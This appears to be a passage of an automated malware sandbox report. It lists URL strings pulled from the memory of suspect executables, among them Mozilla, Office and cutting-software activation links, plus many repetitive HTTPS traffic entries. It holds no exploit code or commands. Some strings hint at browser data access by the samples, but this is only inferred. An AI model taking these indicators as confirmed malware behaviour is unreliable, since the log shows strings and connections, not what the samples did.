Source: file.exe, 00000000.00000003.1877342836.000000001D93D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp, e708276138.exe, 00000013.00000003.2573895190.0000000005B47000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573741961.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.00000000059A7000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2699349639.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005659000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784313428.0000000005660000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973388577.0000000005AC0000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: e708276138.exe, 00000013.00000003.2573895190.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.0000000005982000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005634000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000023.00000003.3082797260.0000000005A02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1877342836.000000001D93D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp, e708276138.exe, 00000013.00000003.2573895190.0000000005B47000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573741961.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.00000000059A7000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2699349639.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005659000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784313428.0000000005660000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973388577.0000000005AC0000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: e708276138.exe, 00000013.00000003.2573895190.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.0000000005982000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005634000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000023.00000003.3082797260.0000000005A02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.VinylCut.co.za
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/cut/activate.php??https://www.craftedge.com/activation/surecuts
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/greatcutd.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/scal6.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/scal6_k.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/skycut_kd.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/skycutd.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/starcut.php?Ahttps://www.craftedge.com/activation/
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/starcut_k.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/vinylcut5.php?Chttps://www.craftedge.com/activatio
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/vinylcut5_k.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/xfcut.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.craftedge.com/activation/surecutsalot/xfcut_k.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.easycutpro.com/activation
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.easycutpro.com/activationGhttps://www.craftedge.com/activation/surecutsalot/easysigncutp
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.easycutpro.comOTrial
Source: stories.exe, 0000000C.00000003.2430863869.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 0000000D.00000003.2435026251.00000000033F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.easycutstudio.com/support.html
Source: e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.gccwebshop.com
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.gccwebshop.comPTrial
Source: e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/1024
Source: file.exe, 00000000.00000003.1967046345.0000000023CAD000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2608228759.0000000005C12000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2735908002.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1967046345.0000000023CAD000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2608228759.0000000005C12000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2735908002.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.xfcut.com/activation
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.xfcut.com/activation?https://www.craftedge.com/activation/surecutsalot/xfcut_kd.php?=htt
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.xfcut.com/store

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50570
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
